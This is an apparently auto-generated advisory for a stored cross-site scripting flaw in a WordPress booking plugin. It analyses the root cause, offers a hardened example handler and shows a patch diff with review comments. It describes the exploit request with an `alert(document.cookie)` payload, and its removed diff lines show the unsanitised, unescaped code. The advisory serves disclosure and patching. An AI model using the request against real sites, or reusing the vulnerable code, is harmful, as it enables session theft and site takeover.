Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-0742: Smart Appointment & Booking <= 1.0.7 – Authenticated (Subscriber+) Stored Cross-Site Scripting via saab_save_form_data AJAX Action (smart-appointment-booking)

CVE ID: CVE-2026-0742
Severity: Medium (CVSS 6.4)
CWE: CWE-79
Vulnerable Version: 1.0.7
Patched Version: 1.0.8
Disclosed: February 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0742:
The Smart Appointment & Booking WordPress plugin, version 1.0.7 and earlier, contains an authenticated stored cross-site scripting (XSS) vulnerability. The flaw is in the plugin’s AJAX handler for saving form data, which lets users with Subscriber-level access or higher inject arbitrary JavaScript. That script executes in the browser of any user who views the compromised page. The issue is rated CVSS 6.4 (Medium severity).

The root cause is insufficient input sanitization and output escaping for user-supplied data processed by the `saab_save_form_data` AJAX action. In the vulnerable code within `/smart-appointment-booking/inc/admin/class.saab.admin.action.php`, the `update_form_entry_data()` function (lines 527-545) uses the `$_POST['updated_data']` values without sanitizing them and stores them via `update_post_meta()` without validation. When the stored data is later rendered in the WordPress admin interface, the plugin does not escape the output, so the injected script executes.

Exploitation requires an authenticated attacker with at least Subscriber privileges. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `saab_save_form_data`. The request includes `entry_id` (the target form entry) and `updated_data[]` parameters containing malicious JavaScript payloads. For example, an attacker could inject `alert(document.cookie)` into a form field value. When an administrator or other user views the affected booking entry in the plugin’s admin panel, the malicious script executes in their browser session.

The patch addresses the vulnerability with several changes. In the `update_form_entry_data()` function, the developer added a nonce check using `wp_verify_nonce()` (line 530). The `$updated_data` variable is now processed through `map_deep( wp_unslash( $_POST['updated_data'] ), 'sanitize_text_field' )` (line 538), so every value in the array is sanitized. The patch also adds output escaping in several template rendering functions, using `esc_attr()` and `esc_html()` for dynamic values in HTML attributes and content (for example, lines 630, 1128, 1203).
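The following is an added example, not the plugin's own code, showing what a hardened version of such an admin-ajax save handler and its rendering code look like when the controls described above are applied together: a nonce for CSRF, a capability check for authorization (a nonce alone does not prove the caller may edit the entry), `map_deep()` with `sanitize_text_field()` on the submitted array, and `esc_*` escaping at output time. Every name prefixed `example_` and the nonce action `example_entry_nonce` are hypothetical; the `manage_entries` post type name is taken from the diff on this page.

```php
<?php
// Added example (hypothetical names); not code from the Smart Appointment & Booking plugin.

add_action( 'wp_ajax_example_save_entry_data', 'example_save_entry_data' );

function example_save_entry_data() {
    // 1. CSRF: require the nonce the admin page was issued (action name is assumed).
    check_ajax_referer( 'example_entry_nonce', 'security' );

    // 2. Authorization: tie the request to a capability on the specific entry,
    //    so a low-privilege account cannot edit entries it does not own.
    $entry_id = isset( $_POST['entry_id'] ) ? absint( wp_unslash( $_POST['entry_id'] ) ) : 0;
    if ( ! $entry_id
        || 'manage_entries' !== get_post_type( $entry_id )
        || ! current_user_can( 'edit_post', $entry_id ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden.' ), 403 );
    }

    // 3. Input: reject non-array payloads, then sanitise every leaf value.
    if ( ! isset( $_POST['updated_data'] ) || ! is_array( $_POST['updated_data'] ) ) {
        wp_send_json_error( array( 'message' => 'Invalid payload.' ), 400 );
    }
    $updated_data = map_deep( wp_unslash( $_POST['updated_data'] ), 'sanitize_text_field' );

    // 4. Only overwrite keys that already exist in the stored submission,
    //    so a caller cannot grow the record with arbitrary new fields.
    $stored = get_post_meta( $entry_id, 'example_submission_data', true );
    if ( ! is_array( $stored ) || ! isset( $stored['data'] ) || ! is_array( $stored['data'] ) ) {
        wp_send_json_error( array( 'message' => 'No submission data.' ), 404 );
    }
    $changed = 0;
    foreach ( $updated_data as $key => $value ) {
        if ( array_key_exists( $key, $stored['data'] ) && is_string( $value ) ) {
            $stored['data'][ $key ] = $value;
            $changed++;
        }
    }
    update_post_meta( $entry_id, 'example_submission_data', $stored );

    wp_send_json_success( array( 'updated' => $changed ) );
}

// Rendering side: sanitising on save is not a substitute for escaping on output.
// Each value is escaped for the exact context it lands in (text node vs. attribute).
function example_render_entry_rows( $entry_id ) {
    $stored = get_post_meta( $entry_id, 'example_submission_data', true );
    if ( empty( $stored['data'] ) || ! is_array( $stored['data'] ) ) {
        return '';
    }
    $html = '';
    foreach ( $stored['data'] as $key => $value ) {
        $html .= sprintf(
            '<tr><th scope="row">%s</th><td><input type="text" name="updated_data[%s]" value="%s"></td></tr>',
            esc_html( $key ),
            esc_attr( $key ),
            esc_attr( (string) $value )
        );
    }
    return $html;
}
```

The two layers are deliberately independent: even if a future code path stores unsanitised data, `example_render_entry_rows()` still neutralises it, and even if rendering is done elsewhere, the handler never accepts a value it has not sanitised or a caller it has not authorised.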

Successful exploitation allows attackers to perform actions within the victim’s WordPress session. This includes stealing session cookies, performing administrative actions, defacing websites, or redirecting users to malicious sites. Since the vulnerability is stored, a single injection affects all users who view the compromised page. Attackers with Subscriber access can target administrators, potentially leading to full site compromise through session hijacking or privilege escalation.

Differential between vulnerable and patched code

Code Diff
--- a/smart-appointment-booking/inc/admin/class.saab.admin.action.php
+++ b/smart-appointment-booking/inc/admin/class.saab.admin.action.php
@@ -199,9 +199,8 @@
 				'message' => 'Invalid request.',
 			);
 			$get_notification_array = array();
-			if (isset($_POST['notification_data'])) {
-
-				parse_str($_POST['notification_data'], $form_data);
+			if ( isset( $_POST['notification_data'] ) ) {
+				parse_str( sanitize_text_field( wp_unslash( $_POST['notification_data'] ) ), $form_data );
 				$post_id = $form_data['form_id'];
                	$index = $form_data['editnotify'];
 				$mail_body='mail_body' . $index;
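Review bot: applying `sanitize_text_field()` to the whole serialised `notification_data` string before `parse_str()` operates at the wrong layer. `sanitize_text_field()` strips percent-encoded octets, so values such as an `@` sent as `%40` are removed before parsing and the resulting fields are corrupted; parse first, then sanitise each key and value of `$form_data`. The unchanged lines below also take `$form_data['form_id']` and `$form_data['editnotify']` straight from the parsed string with no `isset()` guard or `absint()`, which is the point where per-field validation belongs.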
@@ -393,10 +392,10 @@
 		 * Update booking form entries in backend
 		 */
 		function view_booking_entry( $post ){
-			if( ! isset( $_REQUEST['_wpnonce'] ) || ! wp_verify_nonce( $_REQUEST['_wpnonce'], '_wpnonce' ) ){
+			if ( ! isset( $_REQUEST['_wpnonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) ), '_wpnonce' ) ) {
 				//wp_die( 'Security check failed. Refresh the page and retry again!' );
 			}
-            $post_id = ( isset( $_GET['post_id'] ) ) ? $_GET['post_id'] : '';
+            $post_id = isset( $_GET['post_id'] ) ? absint( wp_unslash( $_GET['post_id'] ) ) : 0;
             $form_data = get_post_meta( $post_id, 'saab_submission_data', true );
             $form_id = get_post_meta( $post_id, 'saab_form_id', true );
             $timeslot = get_post_meta( $post_id, 'saab_timeslot', true );
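Review bot: the nonce check in `view_booking_entry()` is still dead code: the failing branch contains only the commented-out `//wp_die(...)`, so a request with a missing or invalid `_wpnonce` proceeds exactly as a valid one does. Either restore a `wp_die()` or `return` in that branch or remove the check; as written it only looks like protection. The `absint()` on `$post_id` is a good change.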
@@ -528,13 +527,14 @@
             <?php
         }
 		function update_form_entry_data(){
-			// if( ! isset( $_POST['zwt_saab_common_nonce'] ) || ! wp_verify_nonce( $_POST['zwt_saab_common_nonce'], 'zwt_saab_common_nonce' ) ){
-			// 	wp_die( 'Security check failed. Refresh the page and retry again!' );
-			// }
-			if (isset($_POST['entry_id']) && isset($_POST['updated_data']) ) {
-				$entry_id = ( isset( $_POST['entry_id'] ) ) ? $_POST['entry_id'] : '';
-				$get_submitted_data = get_post_meta($entry_id, 'saab_submission_data', true);
-				$updated_data = ( isset( $_POST['updated_data'] ) ) ? $_POST['updated_data'] : '';
+			if ( ! isset( $_POST['security'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['security'] ) ), 'saab_ajax_nonce' ) ) {
+				wp_send_json_error( array( 'message' => __( 'Security check failed.', 'smart-appointment-booking' ) ) );
+				wp_die();
+			}
+			if ( isset( $_POST['entry_id'] ) && isset( $_POST['updated_data'] ) ) {
+				$entry_id = isset( $_POST['entry_id'] ) ? absint( wp_unslash( $_POST['entry_id'] ) ) : 0;
+				$get_submitted_data = get_post_meta( $entry_id, 'saab_submission_data', true );
+				$updated_data = isset( $_POST['updated_data'] ) && is_array( $_POST['updated_data'] ) ? map_deep( wp_unslash( $_POST['updated_data'] ), 'sanitize_text_field' ) : array();
 				foreach ($updated_data as $key => $value) {
 					if (isset($get_submitted_data['data'][$key])) {
 						$get_submitted_data['data'][$key] = $value;
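Review bot: the new nonce check closes the CSRF path but is not an authorisation check. Any logged-in user who can obtain the `saab_ajax_nonce` (for instance because the script that localises it is enqueued for every user) can still call this handler with an arbitrary `entry_id` and overwrite another user's submission. Add `current_user_can( 'edit_post', $entry_id )` (or whatever capability the plugin maps to the `manage_entries` post type) after computing `$entry_id`, and confirm `get_post_type( $entry_id )` is the expected type. The `wp_die()` after `wp_send_json_error()` is redundant, since the latter already terminates the request. The `is_array()` guard with `map_deep( ..., 'sanitize_text_field' )` is the right shape for the XSS fix, but sanitising on input does not remove the need for `esc_*` on output, which the template hunks further down address.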
@@ -574,11 +574,9 @@
 			// Add your page content here
 			echo "<div class='notification-page-main m-4 p-1 ' >";

-			if (isset($_GET['post_type']) && isset($_GET['post_id']) && isset( $_GET['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash ($_POST['nonce'] ) ) , 'other_setting' )) {
-
-				$post_type = sanitize_text_field($_GET['post_type']);
-
-				$post_id = absint( $_GET['post_id']);
+			if ( isset( $_GET['post_type'] ) && isset( $_GET['post_id'] ) && isset( $_GET['nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['nonce'] ) ), 'other_setting' ) ) {
+				$post_type = sanitize_text_field( wp_unslash( $_GET['post_type'] ) );
+				$post_id = absint( wp_unslash( $_GET['post_id'] ) );

 				?>
 				<ul class="nav nav-tabs" id="myTabs" role="tablist">
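Review bot: the old condition was both inverted (`! wp_verify_nonce`) and read the nonce from `$_POST` on a GET-parameterised page, so the patched line fixes two bugs at once. Because the opening `<div>` above is echoed before the check, the failure path now silently renders an empty container; consider an explicit `else` that prints a permission message, and a `current_user_can()` check beside the nonce, since the nonce proves origin but not authorisation.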
@@ -632,7 +630,7 @@
 														$fieldKey = $option['fieldkey'];
 														$fieldLabel = $option['fieldlabel'];
 														$selected = ($fieldKey == $first_name) ? 'selected' : '';
-														echo '<option value="' . $fieldKey . '" ' . $selected . '>' . $fieldLabel . '</option>';
+														echo '<option value="' . esc_attr( $fieldKey ) . '" ' . esc_attr( $selected ) . '>' . esc_html( $fieldLabel ) . '</option>';
 													}
 												?>
 											</select>
@@ -994,12 +992,12 @@
 				$response['message'] = esc_html__('Something went wrong', 'smart-appointment-booking');
 				wp_send_json($response);
 			}else{
-				if (null !== ($_POST['post_id'] ?? null) && null !== absint($_POST['notification_id'] ?? null) && null !== sanitize_text_field($_POST['new_state'] ?? null)) {
-					$post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
-					$notification_id = isset($_POST['notification_id']) ? absint($_POST['notification_id']) : 0;
+				if ( isset( $_POST['post_id'] ) && isset( $_POST['notification_id'] ) && isset( $_POST['new_state'] ) ) {
+					$post_id = absint( wp_unslash( $_POST['post_id'] ) );
+					$notification_id = absint( wp_unslash( $_POST['notification_id'] ) );

-					$index = ltrim($notification_id, "notify_");
-					$new_state = isset($_POST['new_state']) ? sanitize_text_field($_POST['new_state']) : '';
+					$index = ltrim( (string) $notification_id, 'notify_' );
+					$new_state = sanitize_text_field( wp_unslash( $_POST['new_state'] ) );

 					// Get the existing notification metadata
 					$notification_data = get_post_meta($post_id, 'saab_notification_data', true);
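Review bot: the `$index` derivation on the `+` line is still broken. `ltrim()` takes a character list, not a prefix, so `ltrim( ..., 'notify_' )` strips any leading `n`, `o`, `t`, `i`, `f`, `y` or `_` characters; and because `$notification_id` has already passed through `absint()`, a value such as `notify_3` became `0` before `ltrim` runs, so `$index` can never recover the original number. If the client sends `notify_N`, sanitise it as a string, check the prefix with `strpos( $id, 'notify_' ) === 0`, and take `absint( substr( $id, strlen( 'notify_' ) ) )`; if it sends a bare integer, drop the `ltrim` entirely.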
@@ -1033,9 +1031,10 @@
 				wp_send_json_error('Invalid request.');
 				wp_die();
 			}
-			if (isset($_POST['indexes'])) {
-				$post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
-				$indexesToDelete = isset($_POST['indexes']) ? $_POST['indexes'] : '';
+			if ( isset( $_POST['indexes'] ) && is_array( $_POST['indexes'] ) ) {
+				$post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
+				$indexes_raw = wp_unslash( $_POST['indexes'] ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- sanitized via map_deep below
+				$indexesToDelete = map_deep( $indexes_raw, 'sanitize_text_field' );
 				$notification_metadata = get_post_meta($post_id, 'saab_notification_data', true);
 				foreach ($indexesToDelete as $index) {
 					if (isset($notification_metadata[$index])) {
@@ -1129,7 +1128,7 @@
 											$available_types = array('any', 'booked', 'pending', 'cancelled', 'approved','waiting','submitted');
 											foreach ($available_types as $avail_type) {
 												$selected = ($avail_type === $type) ? 'selected' : '';
-												echo '<option value="' . esc_html($avail_type) . '" ' . esc_attr($selected) . '>' . ucfirst(esc_html($avail_type)) . '</option>';
+												echo '<option value="' . esc_html($avail_type) . '" ' . esc_attr($selected) . '>' . esc_html( ucfirst( $avail_type ) ) . '</option>';

 											}
 											?>
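Review bot: the `value="..."` attribute is still escaped with `esc_html()` where `esc_attr()` is the correct helper for attribute context; harmless for this fixed list, but inconsistent with the rest of the patch. Moving `ucfirst()` inside `esc_html()` on the `+` line is correct.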
@@ -1204,7 +1203,7 @@

 				$post_id = isset( $_POST['post_id'] ) ? intval( $_POST['post_id'] ) : 0;

-				$form_data = isset( $_POST['form_data'] ) ? sanitize_text_field($_POST['form_data']) : array();
+				$form_data = isset( $_POST['form_data'] ) ? sanitize_text_field( wp_unslash( $_POST['form_data'] ) ) : '';

 				update_post_meta($post_id, 'saab_formschema', $form_data );

@@ -1228,10 +1227,7 @@
 				$form_title = get_the_title($form_id);

 				if (isset($form_title)) {
-					echo sprintf(
-						esc_html__('%s', 'smart-appointment-booking'),
-						esc_html($form_title)
-					);
+					echo esc_html( $form_title );

 				}else{
 					echo '-';
@@ -1241,10 +1237,7 @@
 				$booking_status = get_post_meta($post_id,'saab_entry_status',true);

 				if (isset($booking_status) && !empty($booking_status)) {
-					echo sprintf(
-						esc_html__('%s', 'smart-appointment-booking'),
-						esc_html(ucfirst($booking_status))
-					);
+					echo esc_html( ucfirst( $booking_status ) );
 				}else{
 					echo '-';
 				}
@@ -1262,11 +1255,7 @@
 				$booked_date = $bookedday."-".$bookedmonth."-".$bookedyear;
 				$booked_date = gmdate('d F, Y', strtotime($booked_date));
 					if (isset($booking_date) && !empty($booking_date)) {
-						echo sprintf(
-							esc_html__('%s', 'smart-appointment-booking'),
-							esc_html($booked_date)
-						);
-
+						echo esc_html( $booked_date );
 					}
 				}else{
 					echo '-';
@@ -1276,10 +1265,7 @@
 				$timeslot = get_post_meta($post_id, 'saab_timeslot', true );

 				if (isset($timeslot) && !empty($timeslot)) {
-					echo sprintf(
-						esc_html__('%s', 'smart-appointment-booking'),
-						esc_html($timeslot)
-					);
+					echo esc_html( $timeslot );
 				}else{
 					echo '-';
 				}
@@ -1341,7 +1327,7 @@
 			} else {
 				$error = 1;
 				$error_mess = "Something went wrong";
-				error_log("post_id not found while preview");
+				error_log( "post_id not found while preview" ); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 			}

 			if ($error == 1) {
@@ -1450,7 +1436,7 @@
 				wp_send_json_error(array('message' => 'Nonce verification failed'));
 				wp_die();
 			}
-			$user_mapping = isset($_POST['saabuser_mapping']) ? sanitize_text_field($_POST['saabuser_mapping']) : '';
+			$user_mapping = isset( $_POST['saabuser_mapping'] ) ? sanitize_text_field( wp_unslash( $_POST['saabuser_mapping'] ) ) : '';

 			parse_str($user_mapping, $user_mapping_array);

@@ -1482,7 +1468,7 @@
 			}
 			if (isset($_POST['confirmation_data'])) {

-				parse_str(wp_unslash(sanitize_text_field($_POST['confirmation_data'])), $formdata);
+				parse_str( sanitize_text_field( wp_unslash( $_POST['confirmation_data'] ) ), $formdata );

 				$post_id = $formdata['post_id'];
 				if (isset($formdata['confirmation'])) {
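Review bot: the call order is now correct (unslash, then sanitise), but the percent-encoding concern from the earlier `parse_str()` hunks applies here too, and the unchanged `$post_id = $formdata['post_id']` takes the id straight from the parsed string with no `isset()` guard or `absint()`.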
@@ -1582,11 +1568,11 @@

 				foreach ($options as $value => $label) {
 					$selected = selected($status, $value, false);
-					echo '<option value="' . esc_attr($value) . '" ' . $selected . '>' . esc_html($label) . '</option>';
+					echo '<option value="' . esc_attr($value) . '" ' . esc_attr( $selected ) . '>' . esc_html($label) . '</option>';
 				}
 				echo '</select>';

-				$selected_form_id = isset($_GET['form_filter']) ? sanitize_text_field($_GET['form_filter']) : '';
+				$selected_form_id = isset( $_GET['form_filter'] ) ? sanitize_text_field( wp_unslash( $_GET['form_filter'] ) ) : '';

 				$forms_query = new WP_Query($args);

@@ -1621,30 +1607,31 @@
 				return;
 			}

-			if ('edit.php' === $pagenow && 'manage_entries' === $typenow) {
-				$booking_status = isset($_GET['booking_status']) ? sanitize_text_field($_GET['booking_status']) : '';
-				$form_filter = isset($_GET['form_filter']) ? intval($_GET['form_filter']) : 0;
+			if ( 'edit.php' === $pagenow && 'manage_entries' === $typenow ) {
+				$booking_status = isset( $_GET['booking_status'] ) ? sanitize_text_field( wp_unslash( $_GET['booking_status'] ) ) : '';
+				$form_filter = isset( $_GET['form_filter'] ) ? absint( wp_unslash( $_GET['form_filter'] ) ) : 0;
+
+				if ( ! empty( $booking_status ) || ! empty( $form_filter ) ) {
+					// phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query -- Filtering entries by status/form requires meta_query.
+					$meta_query = array( 'relation' => 'and' );

-				if (!empty($booking_status) || !empty($form_filter)) {
-					$meta_query = array('relation' => 'and');
-
-					if (!empty($booking_status) && in_array($booking_status, array('booked', 'approved', 'cancelled', 'pending', 'waiting', 'submitted'))) {
+					if ( ! empty( $booking_status ) && in_array( $booking_status, array( 'booked', 'approved', 'cancelled', 'pending', 'waiting', 'submitted' ), true ) ) {
 						$meta_query[] = array(
-							'key' => 'entry_status',
-							'value' => $booking_status,
-							'compare' => '='
+							'key'     => 'entry_status',
+							'value'   => $booking_status,
+							'compare' => '=',
 						);
 					}

-					if (!empty($form_filter)) {
+					if ( ! empty( $form_filter ) ) {
 						$meta_query[] = array(
-							'key' => 'saab_form_id',
-							'value' => $form_filter,
-							'compare' => '='
+							'key'     => 'saab_form_id',
+							'value'   => $form_filter,
+							'compare' => '=',
 						);
 					}

-					$query->set('meta_query', $meta_query);
+					$query->set( 'meta_query', $meta_query );
 				}
 			}
 		}
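Review bot: the meta key queried here is `entry_status`, whereas the entry detail column a few hunks above reads `get_post_meta( $post_id, 'saab_entry_status', true )`. If those are meant to be the same field, the status filter will never match; worth confirming which key is actually written on save. The `true` strict flag on `in_array()` and the `absint()` on `$form_filter` are good changes.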
@@ -1699,30 +1686,31 @@
 			}
 			// Define the current page number

-			$current_page = isset($_POST['page']) ? absint($_POST['page']) : 1;
-			$timeslot = isset($_POST['timeslot']) ? sanitize_text_field($_POST['timeslot']) : '';
-			$booking_date = isset($_POST['booking_date']) ? sanitize_text_field($_POST['booking_date']) : '';
+			$current_page = isset( $_POST['page'] ) ? absint( wp_unslash( $_POST['page'] ) ) : 1;
+			$timeslot = isset( $_POST['timeslot'] ) ? sanitize_text_field( wp_unslash( $_POST['timeslot'] ) ) : '';
+			$booking_date = isset( $_POST['booking_date'] ) ? sanitize_text_field( wp_unslash( $_POST['booking_date'] ) ) : '';

+			// phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query -- Waiting list filtered by timeslot/booking_date.
 			$args = array(
-				'post_type' => 'manage_entries',
-				'posts_per_page' => 5, // Show 5 entries per page
-				'paged' => $current_page, // Use the current page number for pagination
-				'meta_query' => array(
+				'post_type'      => 'manage_entries',
+				'posts_per_page' => 5,
+				'paged'          => $current_page,
+				'meta_query'     => array(
 					'relation' => 'AND',
 					array(
-						'key' => 'timeslot',
-						'value' => $timeslot,
-						'compare' => '='
+						'key'     => 'timeslot',
+						'value'   => $timeslot,
+						'compare' => '=',
 					),
 					array(
-						'key' => 'booking_date',
-						'value' => $booking_date,
-						'compare' => '='
-					)
-				)
-			);
+						'key'     => 'booking_date',
+						'value'   => $booking_date,
+						'compare' => '=',
+					),
+				),
+			);

-			$query = new WP_Query($args);
+			$query = new WP_Query( $args );
 			ob_start();
 			if ($query->have_posts()) {
 				echo '<div class="border-top border-dark mb-2"></div>';
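Review bot: the meta keys `timeslot` and `booking_date` queried here differ from the `saab_timeslot` key read in `view_booking_entry()` and in the entry columns above; as with `entry_status`, confirm they match what is written at save time. Consider also validating `$booking_date` against the expected date format (for example with `DateTime::createFromFormat()`) rather than relying on `sanitize_text_field()` alone, so an arbitrary string never reaches the meta query.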
--- a/smart-appointment-booking/inc/admin/class.saab.admin.fieldmeta.php
+++ b/smart-appointment-booking/inc/admin/class.saab.admin.fieldmeta.php
@@ -25,11 +25,11 @@
         }

         function saab_get_available_seats_per_timeslot($checktimeslot,$date){
-
+            // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query -- Seats count filtered by timeslot/booking_date.
             $args = array(
-                'post_type' => 'manage_entries',
+                'post_type'      => 'manage_entries',
                 'posts_per_page' => -1,
-                'meta_query' => array(
+                'meta_query'     => array(
                     'relation' => 'AND',
                     array(
                         'key' => 'timeslot',
@@ -233,15 +233,17 @@
                     </div>
                     <div id="waitinglist_main">
                     <?php
-
-                       $current_page = isset($_GET['page']) ? absint($_GET['page']) : 1;
+                       // Pagination; nonce not used for GET page parameter in admin list.
+                       // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+                       $current_page = isset( $_GET['page'] ) ? absint( wp_unslash( $_GET['page'] ) ) : 1;
+                       // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query -- Waiting list filtered by timeslot/status/booking_date.
                        $args = array(
-                        'post_type' => 'manage_entries',
-                        'posts_per_page' => 5,
-                        'paged' => $current_page,
-                        'orderby'   => 'date',
-                        'order'     => 'ASC',
-                        'meta_query' => array(
+                        'post_type'      => 'manage_entries',
+                        'posts_per_page' => 5,
+                        'paged'          => $current_page,
+                        'orderby'        => 'date',
+                        'order'          => 'ASC',
+                        'meta_query'     => array(
                             'relation' => 'AND',
                             array(
                                 'key' => 'timeslot',
@@ -310,7 +312,7 @@
                             echo '<span class="item-count" style="margin-right: 5px;">' . esc_html($query->found_posts) . ' Items</span>';
                             if ($total_pages > 1) {

-                                    echo '<select id="saabpage-number"  data-timeslot="' . esc_attr($timeslot) . '" data-booking_date="' . esc_attr($booking_date) . '" data-nonce="'.wp_create_nonce('get_paginated_items_nonce').'">';
+                                    echo '<select id="saabpage-number"  data-timeslot="' . esc_attr($timeslot) . '" data-booking_date="' . esc_attr($booking_date) . '" data-nonce="' . esc_attr( wp_create_nonce( 'get_paginated_items_nonce' ) ) . '">';
                                         for ($page = 1; $page <= $total_pages; $page++) {
                                             echo '<option value="' . esc_attr($page) . '"';
                                             if ($page == $current_page) {
@@ -351,7 +353,7 @@
                 ?>
                 <script type='text/javascript'>

-                    var myScriptData = <?php echo $myScriptData; ?>;
+                    var myScriptData = <?php echo $myScriptData; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- JSON schema from post meta, validated on save. ?>;
                     window.onload = function() {

                         var formioBuilder = Formio.builder(document.getElementById('builder'), {
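Review bot: the phpcs-ignore justification "JSON schema from post meta, validated on save" is not supported by the `saab_formschema` save hunk above, which only runs the value through `sanitize_text_field()`; no JSON validation happens, so this line remains unescaped output of user-influenceable post meta inside a `<script>` block. Decode and re-encode before printing, for example `echo wp_json_encode( json_decode( $myScriptData ), JSON_HEX_TAG | JSON_HEX_AMP );`, which yields either valid JSON or `null`, and `json_encode` escapes `/` by default so a literal `</script>` cannot appear in the output. Better still, store the decoded array at save time and `wp_json_encode()` it here.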
@@ -586,7 +588,7 @@
                                         );
                                         //echo wp_kses( $this->timezone_dropdown($post->ID), $allow_time_dropdown );
                                     ?>
-                                    <?php echo $this->timezone_dropdown($post->ID); ?>
+                                    <?php echo wp_kses_post( $this->timezone_dropdown( $post->ID ) ); ?>

                                 </div>
                                 <div class="form-group form-general-group">
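Review bot: `wp_kses_post()` uses the `post` allow-list, which does not include `<select>` or `<option>`, so the timezone dropdown will be stripped down to its text content and the field will stop working. The commented-out line just above shows the intended fix: `wp_kses( $this->timezone_dropdown( $post->ID ), $allow_time_dropdown )` with an allow-list that permits `select` and `option` and their `name`, `id`, `class`, `value` and `selected` attributes.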
@@ -862,14 +864,14 @@
             {
               return $post_id;
             }
-            if (isset($_POST['cal_title'])) {
-                $cal_title = sanitize_text_field($_POST['cal_title']);
-                update_post_meta($post_id, 'saab_cal_title', $cal_title);
-            }
-
-            if (isset($_POST['cal_description'])) {
-                $cal_description = sanitize_text_field($_POST['cal_description']);
-                update_post_meta($post_id, 'saab_cal_description', $cal_description);
+            if ( isset( $_POST['cal_title'] ) ) {
+                $cal_title = sanitize_text_field( wp_unslash( $_POST['cal_title'] ) );
+                update_post_meta( $post_id, 'saab_cal_title', $cal_title );
+            }
+
+            if ( isset( $_POST['cal_description'] ) ) {
+                $cal_description = sanitize_text_field( wp_unslash( $_POST['cal_description'] ) );
+                update_post_meta( $post_id, 'saab_cal_description', $cal_description );
             }
             // Section Tab 1
             // Check if the enable_booking field is set and save the value
@@ -880,68 +882,68 @@
                 delete_post_meta($post_id, 'saab_enable_booking');
             }
             //Weekdays
-            if (isset($_POST['weekdays'])) {
-                $selected_weekdays = array_map('sanitize_text_field', $_POST['weekdays']);
-                update_post_meta($post_id, 'saab_weekdays', $selected_weekdays);
+            if ( isset( $_POST['weekdays'] ) ) {
+                $selected_weekdays = array_map( 'sanitize_text_field', (array) wp_unslash( $_POST['weekdays'] ) );
+                update_post_meta( $post_id, 'saab_weekdays', $selected_weekdays );
             } else {
                 update_post_meta($post_id, 'saab_weekdays', array());
             }

             // Save the radio button value for appointment Type
-            if (isset($_POST['appointment_type'])) {
-                $selected_option = sanitize_text_field($_POST['appointment_type']);
+            if ( isset( $_POST['appointment_type'] ) ) {
+                $selected_option = sanitize_text_field( wp_unslash( $_POST['appointment_type'] ) );
                 update_post_meta($post_id, 'saab_appointment_type', $selected_option);
             }

             // Save the  link value if Appointment Type "Virtual" is selected
-            if (isset($_POST['virtual_link'])) {
-                $link_value = sanitize_text_field($_POST['virtual_link']);
+            if ( isset( $_POST['virtual_link'] ) ) {
+                $link_value = sanitize_text_field( wp_unslash( $_POST['virtual_link'] ) );
                 update_post_meta($post_id, 'saab_virtual_link', $link_value);
             }

             //Symbol
             if ( isset( $_POST['label_symbol'] ) ) {
-                $label_symbol = sanitize_text_field( $_POST['label_symbol'] );
+                $label_symbol = sanitize_text_field( wp_unslash( $_POST['label_symbol'] ) );
                 update_post_meta( $post_id, 'saab_label_symbol', $label_symbol );
             }

              //Symbol
              if ( isset( $_POST['cost'] ) ) {
-                $cost = sanitize_text_field( $_POST['cost'] );
+                $cost = sanitize_text_field( wp_unslash( $_POST['cost'] ) );
                 update_post_meta( $post_id, 'saab_cost', $cost );
             }

             if ( isset( $_POST['timezone'] ) ) {
-                $timezone = sanitize_text_field( $_POST['timezone'] );
+                $timezone = sanitize_text_field( wp_unslash( $_POST['timezone'] ) );
                 update_post_meta( $post_id, 'saab_timezone', $timezone );
             }

             if ( isset( $_POST['bookmap_email'] ) ) {
-                $map_email = sanitize_text_field( $_POST['bookmap_email'] );
+                $map_email = sanitize_text_field( wp_unslash( $_POST['bookmap_email'] ) );
                 update_post_meta( $post_id, 'saab_map_email', $map_email );
             }

             if ( isset( $_POST['cost'] ) ) {
-                $cost = sanitize_text_field( $_POST['cost'] );
+                $cost = sanitize_text_field( wp_unslash( $_POST['cost'] ) );
                 update_post_meta( $post_id, 'saab_saab_cost', $cost );
             }
-
+
             //selected_date
-            if (isset($_POST['selected_date'])) {
-                update_post_meta($post_id, 'saab_selected_date', sanitize_text_field($_POST['selected_date']));
+            if ( isset( $_POST['selected_date'] ) ) {
+                update_post_meta( $post_id, 'saab_selected_date', sanitize_text_field( wp_unslash( $_POST['selected_date'] ) ) );
             }
-
-            if (isset($_POST['start_time'])) {
-                update_post_meta($post_id, 'saab_start_time', sanitize_text_field($_POST['start_time']));
+
+            if ( isset( $_POST['start_time'] ) ) {
+                update_post_meta( $post_id, 'saab_start_time', sanitize_text_field( wp_unslash( $_POST['start_time'] ) ) );
             }
-
-            if (isset($_POST['end_time'])) {
-                update_post_meta($post_id, 'saab_end_time', sanitize_text_field($_POST['end_time']));
+
+            if ( isset( $_POST['end_time'] ) ) {
+                update_post_meta( $post_id, 'saab_end_time', sanitize_text_field( wp_unslash( $_POST['end_time'] ) ) );
             }
-
+
              //Steps Duration
             if ( isset( $_POST['steps_duration'] ) ) {
-                $steps_duration = sanitize_text_field($_POST['steps_duration']);
+                $steps_duration = map_deep( wp_unslash( $_POST['steps_duration'] ), 'sanitize_text_field' );
                 $sanitized_steps_duration = array(
                     'hours' => sanitize_text_field( $steps_duration['hours'] ),
                     'minutes' => sanitize_text_field( $steps_duration['minutes'] )
